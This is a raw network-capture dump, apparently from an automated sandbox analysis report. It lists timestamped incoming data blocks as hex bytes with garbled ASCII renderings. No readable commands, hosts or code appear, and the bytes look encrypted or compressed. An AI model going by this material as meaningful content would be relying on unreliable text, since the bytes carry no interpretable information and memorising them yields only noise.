                                                                                                        2022-09-29 12:45:35 UTC2448INData Raw: 9a e7 a3 65 9b 39 ac 6f 87 38 fe e9 81 69 5a 95 c5 37 90 f3 28 35 05 e8 ec ed 84 e5 3e 9b 79 a3 90 24 e9 be 72 99 2a b4 e9 d7 44 89 ab d7 0a ff af 58 82 2e 08 db 36 21 fe 55 94 31 ab db eb d4 f4 76 22 45 08 6e 5e ac ac 59 b0 63 5b 6b dd 2f 2e 99 c3 8b 5f 45 e8 31 8e 33 ed 5e f8 3a 2a 2f 96 ee 44 da 64 2b c7 72 11 83 11 f8 cd c8 53 c9 ad ad 62 68 b3 ab 57 02 a4 55 6d ca 52 2c c7 39 eb 28 4c b3 8d e1 cf 25 06 8b 2c 69 67 07 27 6a 6b 99 b3 cf 20 13 b3 a5 d9 86 f0 ba 3e b8 cc d6 49 99 60 ea 72 73 b6 05 e3 74 8c 17 30 a6 a8 a1 26 d1 7b 02 aa 65 13 02 f1 5a a7 75 d6 e0 d7 57 17 71 88 26 f8 e7 54 37 11 c1 e6 23 24 c3 78 a2 3c e3 08 3f 00 5c fe cd 99 be 81 00 88 1e 68 7b a7 39 ec da 2f 23 4a ed a4 cb a1 a0 4d 93 61 39 5d e1 42 fd 27 09 7f 89 b5 7e 85 59 7f 13 3e
                                                                                                        Data Ascii: e9o8iZ7(5>y$r*DX.6!U1v"En^Yc[k/._E13^:*/Dd+rSbhWUmR,9(L%,ig'jk >I`rst0&{eZuWq&T7#$x<?\h{9/#JMa9]B'~Y>
                                                                                                        2022-09-29 12:45:35 UTC2464INData Raw: b0 8f 23 02 cf 11 97 d3 1c a9 f2 3e 71 ac fe ba d0 89 69 11 4a e4 1f 7c 73 c6 6d a8 34 0f 7e c7 1e 39 32 ea 0c a0 b7 ed dc f6 cd f7 4d 3f 45 65 56 3d d2 83 8e a5 a5 ab 88 c4 a4 94 c5 e0 50 b2 a1 3b af 36 87 b4 db 83 cb a2 e4 d4 cd bf ba d6 d1 77 5f 09 29 af b8 63 84 15 41 31 40 e2 f6 9f 2c 25 6d 15 c4 d1 0d f0 bb 39 85 87 11 f2 c7 c0 03 0c df 94 34 fb 20 d1 e7 7e 15 06 c2 2e 06 aa fb 21 a8 49 83 63 98 a2 83 b7 dd 4d 00 44 d3 17 13 00 c6 40 68 10 99 62 9b c9 8c 8a eb 96 48 fa 2c db e4 64 b0 00 b5 c0 bc e3 68 7f 7f 0e 69 7d a1 a2 4e 19 14 fe fe 67 25 e7 31 c7 7c 30 eb b7 00 ea 26 b8 cf 89 ec 6e a2 57 e9 14 9d 69 3f a9 85 34 55 14 cb aa 48 49 04 56 a2 ff cd ce 0a 33 21 28 97 f6 dc 79 4c 6f b1 5a 63 e1 98 d1 7c 01 9b d8 9d c5 74 d7 6f b9 ce 18 f5 7c c0 7b 74
                                                                                                        Data Ascii: #>qiJ|sm4~92M?EeV=P;6w_)cA1@,%m94 ~.!IcMD@hbH,dhi}Ng%1|0&nWi?4UHIV3!(yLoZc|to|{t
                                                                                                        2022-09-29 12:45:35 UTC2480INData Raw: ab 4c d4 c2 36 a9 28 0e b7 c0 da 4f 9b d5 c5 13 65 a8 a3 95 06 2a e6 c9 63 9d f7 37 1d dc f6 30 c8 a1 c9 e6 e0 b6 e7 d6 50 e6 8a 90 01 dc e1 8e 45 4a fc e1 a8 58 50 55 b4 7b 6e e2 b8 e9 7f 2a 51 2c 69 98 94 25 7f 62 c4 c1 b4 4b b5 0c 01 80 18 43 1c 50 de 01 ed 27 27 96 25 3d cb 86 ea 87 98 78 dd b3 84 6e 53 97 dd 7a 9b 29 72 a5 44 93 82 cd cf 3f 0b 4a bc ac 00 88 c5 65 1c 15 93 5f 55 84 b7 56 34 76 7a ba 41 b3 54 ea dc b8 38 08 45 7a c6 da da 79 97 7f 9c 15 80 a5 43 1c 40 be c8 d7 8e 8a 3f 0c fd 85 c0 17 71 91 1e e5 d0 8e d5 3f 50 8e d9 a0 a5 8c b1 9c 59 2a 40 fe 2a c5 fe a1 83 ad c7 70 b8 86 83 9b 9b 3c 53 3d a0 70 7d cb cc 6a 0c 74 9a 06 ed fc e6 cb f1 60 f7 fd 24 19 50 1d 99 d4 30 87 b9 24 72 fb f9 97 e7 31 de 17 10 23 e8 3a f1 a7 cc 29 22 7d da c9 b6
                                                                                                        Data Ascii: L6(Oe*c70PEJXPU{n*Q,i%bKCP''%=xnSz)rD?Je_UV4vzAT8EzyC@?q?PY*@*p<S=p}jt`$P0$r1#:)"}
                                                                                                        2022-09-29 12:45:35 UTC2496INData Raw: dd 2e 9a ef 6b 4e 52 ec f7 f2 8d b7 d4 58 99 2e 04 0f cd 26 4e 67 b9 f0 05 80 33 f9 4b 6e 25 62 05 19 ae 2e c1 9c 64 ab 66 f1 88 98 c1 d8 bc 67 84 93 d6 c4 3d 26 1a 9a a3 9b b7 9a 62 5a e5 1e 63 67 3d fe 48 fa 4c 4a fd 0c 7f 75 b7 a3 39 e7 d4 29 67 ed df 03 4c ba 13 e7 47 9b 28 d9 01 69 d4 f8 79 81 fc 01 ed ce dc 7d 76 f9 88 84 34 56 e9 0f 54 b9 df cb d5 4a 43 70 c2 50 44 98 3e c2 7c 8d 30 0c 39 15 9e b1 a2 54 41 01 19 81 99 3b ad 29 31 c3 d2 27 ca db b8 66 02 8d ef 37 fc 02 91 9c 0e 50 5f 32 b6 24 30 12 08 f4 0a 07 37 08 86 0a fa b9 ef d8 e3 5a 4b db 31 b3 66 a3 50 3a cc b7 19 78 d2 97 33 a0 27 e7 79 3a b4 fb b3 ab 79 3a f7 ea 74 cc 92 f8 f0 e7 d8 03 4f 64 7e ae ac 19 74 b7 e0 e6 34 71 9e 2e ca 5b ff cc 15 44 fc 94 7f 2d ac e2 a8 2c 84 d3 32 f7 7d 4c 5f
                                                                                                        Data Ascii: .kNRX.&Ng3Kn%b.dfg=&bZcg=HLJu9)gLG(iy}v4VTJCpPD>|09TA;)1'f7P_2$07ZK1fP:x3'y:y:tOd~t4q.[D-,2}L_
                                                                                                        2022-09-29 12:45:35 UTC2512INData Raw: 2b a9 cb 58 2e 55 39 ab d0 4d 1a ee 53 d1 60 79 17 dc 1a a8 d1 a8 0b 7b d3 74 f8 b2 8d a0 ce bc 08 1e c3 67 92 c4 ce d0 7c 0b 9e 62 77 8b 94 e0 71 d2 38 90 88 38 a1 fd ec 08 09 f4 dd 54 7e f7 e6 ec d2 e2 b2 d9 1b d5 9e 9f 3f 46 6d 8a ba d6 5d 96 b1 d0 f6 af 6d 87 d6 ca e4 b1 07 86 1d 73 0e ee 60 b8 6b 03 18 86 77 b8 f7 bf 8b 2f 95 6a e5 c2 a0 00 73 8d 96 83 ca 4a 92 ef a5 fa ab df 3e d4 c0 b6 ba 49 2f d8 a4 96 1c 1a 09 9f 20 6f 67 83 a7 ef 2f ac 2b 06 47 14 3d 3d 41 3a 78 11 2f 82 5b e1 dc 11 f2 56 77 08 dc bc 40 39 f2 2d b3 bc 3a 71 35 04 1d 75 e3 3b 9f e5 cd 0f de b6 08 8b d6 63 d6 9e d4 69 e9 89 64 e3 98 6b f7 34 bd 61 55 47 31 c7 e9 47 ca a7 9a c0 97 d5 52 b0 25 4e 69 d5 1f 40 4a 89 ab 5b 7b 2d 2d 24 91 e7 9e ec 0f 6c 32 4a 92 c2 a7 34 9e 37 12 28 bc
                                                                                                        Data Ascii: +X.U9MS`y{tg|bwq88T~?Fm]ms`kw/jsJ>I/ og/+G==A:x/[Vw@9-:q5u;cidk4aUG1GR%Ni@J[{--$l2J47(
                                                                                                        2022-09-29 12:45:35 UTC2528INData Raw: f0 e2 5a 79 0b 65 a3 58 28 93 3b 4c 87 e7 9d 71 fb 04 db 6a 93 f7 79 5e 86 77 d2 d9 71 16 21 c0 17 f6 e7 c2 1b 29 6a d2 4f 58 5c f8 bc 91 78 fd a9 43 c9 14 b5 92 a0 b9 56 37 1c 0a a8 02 8c 37 ed bd 31 f5 98 67 1f a7 fb 14 61 a1 67 71 34 4d ac d1 68 38 00 1a d6 06 8e a2 9c 17 72 b4 c7 17 02 d5 b1 4b f5 c2 78 1e 46 d8 9e 00 f3 89 a9 fb 1b fd c9 ab b3 35 d1 54 31 66 84 30 d7 d5 c7 75 a1 e5 29 b3 45 d3 d5 19 7e 5f 85 3a 28 71 a9 9d b4 ea 56 81 2c 6d fe c3 d0 4b 20 d7 38 07 b4 44 31 92 33 2f 98 f1 09 d0 d0 f9 2c ad 45 0b 93 6f cf bd a7 e4 a4 b1 de 23 8c e1 a4 b3 75 53 e8 66 9b e0 91 60 f7 6a 8e 14 cb 57 73 1b c3 a7 97 15 7b 82 40 d5 e9 c4 51 f9 4e eb cd 98 5c d5 8e 89 d5 62 71 b0 76 9e a5 18 66 34 6a 06 77 b5 2e eb eb 8d 58 e2 9c 4d fd 87 b9 00 66 dd f7 48 d9
                                                                                                        Data Ascii: ZyeX(;Lqjy^wq!)jOX\xCV771gagq4Mh8rKxF5T1f0u)E~_:(qV,mK 8D13/,Eo#uSf`jWs{@QN\bqvf4jw.XMfH
                                                                                                        2022-09-29 12:45:35 UTC2544INData Raw: d9 c6 fc ba 3d be b3 5a d0 7f 61 6e 34 83 54 42 c5 bb 22 67 a7 fe 58 45 e6 df f2 e8 32 7c 2d 30 a8 e8 fb fb 11 e0 35 3e d9 5a fa e4 db 6f 71 df 53 71 67 7e 30 49 67 30 96 a0 aa a2 b6 c9 16 a4 36 10 16 cd ad 20 b6 ff 11 0e 24 4e 02 2a a0 b8 8b 94 a3 c7 72 03 59 ce 47 64 27 b1 c8 8f 00 73 ab b8 2c 52 81 11 15 97 53 c6 de 63 1b c4 e8 d2 01 da ab 42 db a1 da 5e 2b 01 57 a4 36 80 6d 73 70 18 43 2d 5a a4 2f b7 79 13 45 c9 97 01 a3 4e cb 90 fb c1 6d b9 f8 74 72 87 3f d8 b1 3f f5 91 bc 32 ed 99 d1 52 92 1a 41 27 6a 19 1c cb b1 2f 41 79 2b 40 bd 53 c0 d0 f6 3a ea e8 d6 71 6b 8e 82 54 9c 0f e5 64 10 20 02 5c d7 21 99 38 80 47 22 f8 65 e1 8b 37 49 c0 b4 0a 0b 16 d0 ee 29 89 86 35 11 70 33 00 88 fa 0b 34 de 23 0b 1c ea f1 62 d1 76 93 40 93 04 f0 73 1b 5c ac c5 34 09
                                                                                                        Data Ascii: =Zan4TB"gXE2|-05>ZoqSqg~0Ig06 $N*rYGd's,RScB^+W6mspC-Z/yENmtr??2RA'j/Ay+@S:qkTd \!8G"e7I)5p34#bv@s\4
                                                                                                        2022-09-29 12:45:35 UTC2560INData Raw: e3 00 92 34 30 4e d7 41 33 37 5b ae 95 4b a1 89 8c eb cb 51 d5 7f d4 9f 0f 40 6e 75 ab 40 80 52 5b 07 76 3b 84 e1 ff 9a 65 52 e9 d5 d8 c5 5f e2 f6 cd db 96 66 36 6b 58 19 a6 e9 3c ba 79 de a9 8a 83 af 01 b8 60 84 62 16 cc 08 9a b2 a2 1a 07 b1 44 a3 32 9b 80 71 b8 f3 ef 20 35 c8 74 b8 84 3c 4f fe b1 5d a2 d4 3e 09 15 2a 7b f0 29 52 a0 08 1d b2 16 9e 58 81 ce 59 88 c9 9f 27 98 70 09 21 2a 59 0d fb 23 c4 da e7 35 d8 3e 05 c1 1e 23 94 15 69 59 61 0d 58 b4 d5 a5 aa fe 54 7f a6 56 4e bb fb ea b3 c4 e3 d3 01 00 08 ae 6a 4b c9 9f f3 48 47 04 7e ae 4d f5 86 49 b7 07 97 f3 e2 e4 7a 66 39 b7 26 de d5 63 9b 0a a8 e9 28 81 e5 34 21 68 24 27 90 d6 59 c4 34 fd 08 3f ab 0f c5 39 4c c8 a2 8a b1 94 ec a1 12 a8 c1 01 80 75 44 99 83 93 ae 5f dd 34 37 a5 d7 3f fc c6 17 df 65
                                                                                                        Data Ascii: 40NA37[KQ@nu@R[v;eR_f6kX<y`bD2q 5t<O]>*{)RXY'p!*Y#5>#iYaXTVNjKHG~MIzf9&c(4!h$'Y4?9LuD_47?e
                                                                                                        2022-09-29 12:45:35 UTC2576INData Raw: 0b 89 94 99 fa 28 2b fc f7 83 4d 20 eb 42 bb 1d f7 28 95 d9 04 39 9f 35 0c f1 2a 2c 98 ab d1 bb 63 c4 2e d2 63 8b ae f5 1a 3e 70 ed c3 e0 01 40 e0 10 38 29 39 0d 38 98 c9 0b 9f 8b 3b 72 0d ee 67 85 fd 3d 9f df 8b 43 2d da 51 81 32 f4 fd ae 15 66 af 1a 8e 7b ce 3f 3e 66 4b 94 84 81 15 d2 4f b8 15 d7 7b 77 66 fa 2b 0c 49 43 2e da a4 23 da 98 5e cb fb 39 0e 3e bd d7 f3 3a 67 0e 22 d8 84 7d 9a a1 7f f3 17 be ae 57 40 e2 cb 44 d0 60 ec 70 b8 e6 c6 b4 83 37 fd a7 3b 16 e6 19 d8 bd 24 5d d2 8b e2 a5 05 e1 1f 85 e1 ac bd ba ef 46 76 89 1f 16 5f c7 8c e0 b1 9f d5 37 13 3d 1a 7b 77 89 48 4d d4 6c 1f 4b de aa c2 2e 27 2b a4 91 3f af b1 a1 0b d0 e6 be 27 e2 42 4f 2c 91 3e 5d 9d 29 6d db 8b 17 c8 b7 a0 08 30 61 23 78 de 19 f9 48 4c 40 c9 a6 81 1c 7d e5 ab d1 38 ef 1f
                                                                                                        Data Ascii: (+M B(95*,c.c>p@8)98;rg=C-Q2f{?>fKO{wf+IC.#^9>:g"}W@D`p7;$]Fv_7={wHMlK.'+?'BO,>])m0a#xHL@}8
                                                                                                        2022-09-29 12:45:35 UTC2592INData Raw: 89 1c 4c b3 47 f7 f2 4b a4 52 05 f2 72 f1 07 a0 1e c1 54 22 01 2d d9 ad 39 ca e0 f8 b7 46 8c 27 d9 67 6a 44 1d 42 ae 48 42 59 f8 2c 37 cf 4e e6 62 52 d1 ca cb 1e 01 3c e9 2a e3 d9 a2 16 f0 0e c9 7a c9 ef 5e 31 b1 ff 87 5b 79 5a c2 d2 ae 9f 16 ec be 77 f2 5e 9e 8b e1 14 4b dc 84 2f 93 79 e5 e8 c9 c2 16 a8 aa 20 7d d7 51 97 4f 60 49 0f d5 b0 4d d8 53 e7 bd f6 49 15 eb ea 68 f1 97 0a 09 40 4f 6e aa 71 7b 49 32 9b 37 50 8f 19 be d8 49 69 e3 13 58 7e fa 23 40 f5 09 cf 55 9a c0 c8 07 b6 7d f6 e2 36 a9 ef 69 e2 26 5c 91 1e fa 61 6b e9 13 db 21 ea 12 b9 f8 ea 3e 11 81 eb 30 d6 d2 39 48 70 a3 f7 ef 96 76 4b 0f c1 9f 74 79 07 2f bc 0b cf 67 b1 66 e5 0e 4b 50 26 bb 7d 62 3e 06 56 d3 f3 d1 8b 50 59 ce 42 1f d1 ae c5 2e e9 12 c2 6c 5d 3a 88 18 22 c3 75 f8 b1 d1 93 a7
                                                                                                        Data Ascii: LGKRrT"-9F'gjDBHBY,7NbR<*z^1[yZw^K/y }QO`IMSIh@Onq{I27PIiX~#@U}6i&\ak!>09HpvKty/gfKP&}b>VPYB.l]:"u
                                                                                                        2022-09-29 12:45:35 UTC2608INData Raw: f0 02 60 89 e4 1d 1a 45 1b df db 50 9a 67 bf 45 33 16 d3 4b df 9e 9a a7 59 ea 4e 3a 1a 4d 26 d3 41 d6 00 a2 21 33 a3 fd d2 17 5a 26 db 2f f1 9e 45 a3 66 b4 3e be 70 b4 29 61 22 ec 86 f1 d2 c4 80 03 60 76 43 a5 08 20 5d 6e 46 b8 3c 8f e9 29 34 25 26 80 bd 96 4c d3 f1 af d5 87 43 41 1d 8f ed 3c c9 c0 f4 59 d1 7e 38 19 21 15 6d e4 d5 a7 c5 97 f0 8d 12 aa c6 0a 3f f2 1f e0 53 f0 63 3a a2 d4 39 21 87 4a b2 a5 d6 bf 7f 27 3e 0e eb 19 58 f0 d4 5f 41 ca 53 c9 75 fc ba c3 e4 75 78 73 a2 05 1b 9c 76 9f 58 de 15 98 47 eb b3 c8 94 29 43 e5 fb b9 b7 2e 7f bb 15 e4 45 f6 3e b7 97 f7 bb c7 bf 1b f6 68 b1 ea d9 18 c9 3d ba 81 a5 4b c7 0d 80 38 5e 33 71 9d 1a 32 d7 9c dc 62 68 ea a6 bd 4c 1b 54 c7 32 84 9b 8b 7d ad ba 0b 6b 78 38 ba 5a 5f 58 3d 6c 31 14 36 be e9 24 d5 93
                                                                                                        Data Ascii: `EPgE3KYN:M&A!3Z&/Ef>p)a"`vC ]nF<)4%&LCA<Y~8!m?Sc:9!J'>X_ASuuxsvXG)C.E>h=K8^3q2bhLT2}kx8Z_X=l16$
                                                                                                        2022-09-29 12:45:35 UTC2624INData Raw: c5 1b 7d 91 71 4f b6 7d 5e dd 01 ce 2d cd c1 51 01 a4 71 3b e8 a2 df 9e ae 1c 28 c5 c2 4e 37 47 b3 c2 be 29 f7 34 2c a6 25 d5 5c 93 f8 f6 57 ee 4e 81 0e 12 2d 26 4c c0 0a 3b ef cf 11 e6 2d 74 26 fe 6e 8b 88 21 d6 0c e8 a2 5e df 6d 1c 6b fb 55 e2 d2 32 cd 98 81 ee d8 01 93 d8 d5 47 7f fc 27 f4 6f c5 b1 9f bc b5 b2 91 91 51 34 b4 fb 5f ec 9a 5e 20 f1 dc b2 f8 bc 77 21 06 15 c9 50 cd 6b 51 e8 93 ec cc cf 24 2c 10 4e 6e 8b 40 08 90 4f 97 94 67 71 36 49 31 56 62 23 96 61 28 49 2a 8f 99 e0 07 82 04 e3 f9 c7 2d a9 35 3c 82 80 eb 66 a8 15 c3 03 e4 bd 0a d6 de e9 90 33 ad 00 a0 f0 94 ec 53 fc 23 70 71 56 65 ea bc ee 96 b0 3e ab 87 3d 29 d8 94 4c 1f e3 53 96 fa 78 84 f2 19 8a 5a 71 56 30 98 49 b6 f4 ed 2c df 7c 52 97 93 85 4a 44 24 c6 3e 83 3d e8 0e ed 98 6b 5d e1
                                                                                                        Data Ascii: }qO}^-Qq;(N7G)4,%\WN-&L;-t&n!^mkU2G'oQ4_^ w!PkQ$,Nn@Ogq6I1Vb#a(I*-5<f3S#pqVe>=)LSxZqV0I,|RJD$>=k]
                                                                                                        2022-09-29 12:45:35 UTC2640INData Raw: 7c 5b 31 d3 b6 6a ae 76 ff 0c e0 c1 1d c0 32 72 2a 24 e8 c4 b5 63 f7 ca a9 eb 34 14 0a 9e 45 96 4e 60 c1 76 c9 c8 1e 01 65 74 01 53 a4 c6 43 44 a2 69 3c f3 33 52 ef e5 8d 76 13 61 a8 48 b4 94 c2 73 a7 e9 16 16 a9 40 d6 3f 1b 48 14 a0 08 95 33 10 cf 27 e7 1b fb 77 77 31 c6 63 75 da 81 d4 f6 fb 95 98 c2 c4 18 af ec 79 21 4d df 2e bd 66 62 57 28 15 98 ee bc 1c 9c 80 df ed e4 2c c5 85 a6 b6 d3 c1 20 be ee d5 aa a8 08 e2 6a 06 66 e5 18 2b 6d 56 db ba 35 6f f0 95 e1 85 28 85 d8 1e 22 40 9c 05 da 81 76 74 9b da e7 e9 82 29 5d 0b d6 69 54 1b 53 4d b1 17 87 19 47 72 0f 05 91 36 85 14 c5 17 4c bf ef 23 dc 35 6a 1b 9f fa 39 25 04 43 b4 79 bc 83 ac 0b 1b c8 93 45 c8 9c d2 b6 19 32 0e 86 c7 4b cc ed b2 be a5 50 53 86 17 cc 60 c0 32 a9 5e 34 d4 6f fc 61 1d fa 32 c5 aa
                                                                                                        Data Ascii: |[1jv2r*$c4EN`vetSCDi<3RvaHs@?H3'ww1cuy!M.fbW(, jf+mV5o("@vt)]iTSMGr6L#5j9%CyE2KPS`2^4oa2
                                                                                                        2022-09-29 12:45:35 UTC2656INData Raw: f4 e4 65 d0 9d af 9d 8d 4e 96 a3 42 62 31 b3 ba 03 d4 26 2f f6 ce 8c 8c b5 9a b2 61 ed 7b 97 d1 80 c6 1d 72 65 bb 1b ec f8 c8 25 7e e6 aa 59 61 c6 00 bf 85 6b 83 24 1f df dd ef 59 fc 9d da 94 cd 35 53 88 cf 72 ec f5 47 05 5b f9 15 71 29 f2 94 90 ca 86 e5 c3 53 25 f6 3b 1b db 23 dd 41 22 8d 2b 93 24 fd b8 da db a9 bf 4c b5 b9 35 a0 46 ba 86 cb de 91 92 76 a2 57 1d ce 72 f8 1b 5c 60 ff b1 5e ef 2f 33 7c 19 de 5e 1c b0 fb 6f d3 ac 4b 81 eb 46 5d ea 46 15 b1 2f 3b 13 b4 94 7e 0a b4 4f f2 89 a9 b4 78 c8 6a 58 97 d9 ab 3a c7 04 f5 24 e4 f6 88 55 9a bb 51 29 8c fd 7f 39 e8 1b 98 ba 87 cd c3 f7 61 26 41 0b b1 6d 4f d5 dd 6a 79 ef 9a 6d 66 cd 85 ee 22 a4 4b 6b 42 57 7d dd 14 28 25 b1 ee 65 bf 31 eb b3 7d 39 01 5e 9f fe 64 7a 5c 0b bb 56 28 bc 3f 73 8c 97 92 63 cc
                                                                                                        Data Ascii: eNBb1&/a{re%~Yak$Y5SrG[q)S%;#A"+$L5FvWr\`^/3|^oKF]F/;~OxjX:$UQ)9a&AmOjymf"KkBW}(%e1}9^dz\V(?sc
                                                                                                        2022-09-29 12:45:35 UTC2672INData Raw: 2e 54 7e cb 6b 75 97 b7 81 5e 8b 89 8f 6a ad 69 16 6f 0b 3c 4c 7c f6 a4 7c b8 82 ea 6e 17 20 2e 31 97 62 e7 c3 25 cf f4 a6 68 d4 06 a3 02 d7 ad e6 48 8f 0c 4e 16 e9 dd 9b 81 b0 40 d1 fa c0 8d 53 3e a2 95 5e 08 9f bf cc bd b5 47 e8 5a de 2a b0 ae 70 66 d1 af e1 50 b8 2b 72 12 d7 34 c4 4c 3c 8d 82 b4 4b 1c 24 19 d0 0e 03 48 5a c4 1d e5 9b f8 ce 8f f2 fe 21 78 5b dc 69 3d 90 f7 58 54 e8 23 18 93 02 b5 36 ed 40 05 04 5f 5f c5 d9 22 ea d6 6a c7 ce 88 df 0b 86 9e 6a c3 ee 32 e4 be 51 56 8e 15 8c ed 8f b2 57 b1 5d 14 32 28 36 e9 c5 c8 f3 c7 aa 06 63 a3 28 f7 23 c9 e4 a9 00 d7 41 32 46 03 f3 d9 fc 43 19 8d 52 fe 74 9d 36 12 89 6b 06 9b 99 2b 87 20 0b 03 98 60 ed 48 98 af 10 44 d0 39 ca 03 72 62 93 36 b9 58 30 88 91 8b 48 74 e9 27 ef 75 ad ad 1b 5d b1 66 8f 87 c4
                                                                                                        Data Ascii: .T~ku^jio<L||n .1b%hHN@S>^GZ*pfP+r4L<K$HZ!x[i=XT#6@__"jj2QVW]2(6c(#A2FCRt6k+ `HD9rb6X0Ht'u]f
                                                                                                        2022-09-29 12:45:35 UTC2688INData Raw: 07 a8 86 61 85 1e cb 9c 70 18 a8 54 a9 83 7e f7 58 a3 69 97 a4 cc 1d 52 6f fc 6f cb ce 0a 99 6a 46 d6 7d cb 49 2e a6 fa 2c 86 87 8d a9 67 25 0f 38 19 77 51 b3 ec 67 21 4c 44 a5 75 81 83 87 d6 f9 3f 42 b0 69 1b be 84 ed 76 4e 2d c0 c0 b3 60 e8 a7 2a c8 b8 7d de 29 1e 25 87 8f 69 18 3b 7b 30 00 d2 a8 22 69 c9 8f d1 be 9c 3c 3e 51 ad 04 01 29 53 a3 a3 c4 97 25 02 00 61 e9 e1 b2 7e 4e 1b 6e 17 38 2c 7d e2 ed f7 ee 40 03 9b 12 70 3f 55 27 e8 43 87 b5 b6 ff 81 5d 4e e8 18 40 c6 bd 87 00 25 d4 dd 5f ef 20 52 6b 40 79 cd 6e 56 5a 9e 45 09 18 17 c3 b1 b9 15 15 d9 79 db 9c 9e c0 a9 46 f5 d7 ad 7f 11 d7 e3 2a d2 44 13 6f 98 f5 40 42 d2 80 38 57 a1 2a 04 42 d9 50 b6 f3 cf 3f 1b 7c 30 03 ba d0 75 f3 88 e1 dd ed 77 9c ae 11 ca 9c bd 9f d6 d0 d3 6d 4b 0c 4c a7 0e b7 cc
                                                                                                        Data Ascii: apT~XiRoojF}I.,g%8wQg!LDu?BivN-`*})%i;{0"i<>Q)S%a~Nn8,}@p?U'C]N@%_ Rk@ynVZEyF*Do@B8W*BP?|0uwmKL
                                                                                                        2022-09-29 12:45:35 UTC2704INData Raw: 4e 00 dc 02 c2 d3 ef 61 fa 92 c0 d9 73 32 28 2f 25 de c7 cd d1 0e d4 3a 01 99 65 5e 87 02 07 1b ee 15 08 df 9a b7 76 7a 38 21 67 a2 8d 96 ec 2b 99 29 f1 e2 a0 09 83 07 2a 7e 3c b3 5f 6a 0c c4 8e dd 3e db 35 95 1b 2b fd c6 af df f4 c5 a4 2e 8b c6 7d d5 12 06 3b d0 7b 8d 02 d8 e3 eb 10 97 77 03 ea 8f 6d 6b ff 90 f1 d9 a0 65 50 f2 46 57 6e 11 0a ae 4c 35 28 66 2d a0 44 fd 62 d1 f6 91 2a f0 37 6a a2 9f 5f bb b9 f3 29 3c 3b eb 04 d6 3d f5 1b 05 a7 c9 d4 0d 75 07 e4 84 e1 37 2e 5d 97 64 e5 71 ea aa 8d 33 f2 e1 ff f9 fb 0c 40 6c 69 f6 1f be 2f 69 6e 93 6c 9a cf dd f0 d1 46 2e b2 c3 08 cd 03 f6 4d 74 da f8 60 7d 89 67 13 7d fe da 2f c9 71 0a f0 5a 65 90 da d7 54 73 26 10 1e 02 73 be 23 34 a5 96 98 5e 6a 87 79 2f d6 43 cb 33 3e 09 44 b7 a4 53 b1 2b 95 39 49 1b 07
                                                                                                        Data Ascii: Nas2(/%:e^vz8!g+)*~<_j>5+.};{wmkePFWnL5(f-Db*7j_)<;=u7.]dq3@li/inlF.Mt`}g}/qZeTs&s#4^jy/C3>DS+9I
                                                                                                        2022-09-29 12:45:35 UTC2720INData Raw: a6 ad cf 39 17 b6 93 e8 d3 b1 38 51 9a b7 80 f5 3a d4 db 71 ef f4 9f d9 d5 7e 23 09 cb f1 9b 62 cd 6f a5 7f 0b b6 d0 63 7a c2 8a a5 41 2a 54 42 6a 1c 20 c7 27 f4 cc ef ee b6 df 86 43 6a df d6 6b 3b ad 98 f7 9b 30 5d 74 74 b5 d9 0b 9a 41 09 73 a2 29 b9 5b 8c 20 33 bd 42 ec 0a db f5 b8 39 53 76 03 57 05 10 d0 91 e9 d4 5d 97 13 09 61 03 f9 f4 d0 ca fa b8 11 79 27 bc f9 a0 df 0e 66 5d 15 08 b8 20 ac 46 88 54 fe 6c ca da 35 88 a4 96 34 d8 22 ff 0d fc 43 75 ab a8 7a 2e 91 0e cb ef db 6a d4 50 76 7d 87 a8 40 f8 28 ca a6 6d ed 6c 84 81 7c f5 44 c1 2e 6b c5 fc 00 4e 2c 95 28 4b 68 bc bf 61 ae e3 9f 2c 0c 5a 59 c1 8f ec 4b 0e b2 20 e2 f0 2b a8 f3 9f 0e bb e6 31 6c 38 cb 3c b2 b5 4f 81 fd 35 33 5b 83 b0 ed a5 53 bb 76 98 43 18 33 34 c4 ed 1e 7e ac e7 fc 8b 3e 8e 3a
                                                                                                        Data Ascii: 98Q:q~#boczA*TBj 'Cjk;0]ttAs)[ 3B9SvW]ay'f] FTl54"Cuz.jPv}@(ml|D.kN,(Kha,ZYK +1l8<O53[SvC34~>:
                                                                                                        2022-09-29 12:45:35 UTC2736INData Raw: b4 0f 8f 99 c2 bd d7 8a 4e 4b 3a 7d 08 c3 d9 46 fa d1 cb bf 3b 44 d5 ba ac 31 62 dd bc 63 58 e3 bd 06 1d 15 20 94 09 cd 58 7e 8d 8b de 28 3b 9b 7c 7d df ef 97 74 9a f5 87 78 5a 37 71 3e 0a 25 54 6d 4e d1 46 e2 6a 5a ac ac 3b 95 a3 3e 25 2e 13 b5 ce c1 25 8c 84 3e 76 4c 91 bc e2 7f d8 38 c0 dc de cd 6f 17 c8 4e c4 5f 19 e6 ea e1 a8 13 90 a3 5b 08 22 19 0e 8d aa ba b1 c8 bd 1c ad d3 b6 ca 48 f1 2b 96 c3 d0 a9 1a bd 9b d3 f3 6d 57 07 a9 92 60 d2 73 77 f8 92 6b ad b5 8e 57 15 68 8f 2e c7 63 16 43 0d 69 cc 02 0e 65 a5 b9 7e 1d 25 9d 13 da 03 6d 18 65 8d 76 00 d2 e8 04 c2 4b 29 3b 5b b7 f1 b7 40 e0 4e 8e 32 55 38 02 02 71 ad af 84 17 f1 e1 47 ab 61 8e 27 3a bb 5b 7b 09 a9 80 f4 fe ea 52 19 38 5a e5 1b c6 42 7b bb 6e 5c 85 82 f5 6b f7 43 e7 cc 2c 6d db 25 9e 6a
                                                                                                        Data Ascii: NK:}F;D1bcX X~(;|}txZ7q>%TmNFjZ;>%.%>vL8oN_["H+mW`swkWh.cCie~%mevK);[@N2U8qGa':[{R8ZB{n\kC,m%j
                                                                                                        2022-09-29 12:45:35 UTC2752INData Raw: 6d 84 3b 4b 6c e1 f0 77 36 db 04 e5 78 07 6c 38 a3 66 7d a4 de a2 1a a8 bc 7a 65 31 50 57 f8 ab 16 2a 64 8f 04 aa 2e 27 a8 c6 47 9e de fc 3c 6d 87 db b9 09 59 68 f6 f8 8c cd 65 cc 08 36 19 11 54 91 9e 65 05 08 ec 49 d0 fd 11 34 c2 c1 a6 a2 86 fb bc 05 da 41 a4 3f e3 cf 3c a6 ff 72 55 7e 11 98 6f c5 c9 b8 e2 da a5 b0 14 45 53 18 91 df 0f d2 81 78 49 40 66 b5 1f 9b de 48 ea 11 22 21 c2 bb 31 da 17 bf 82 ae 80 37 69 07 78 38 bd 22 a1 37 ea a1 da a6 27 00 e1 38 16 fa 01 c5 35 81 2b a3 a4 95 dc 3e 45 3a 32 ed f1 30 4b bb a8 23 cf 01 88 1e dc 8f 83 d2 5f fd 1d 5a 28 ec bf 5f 46 70 5a d4 1a 7c e9 c6 30 f0 22 53 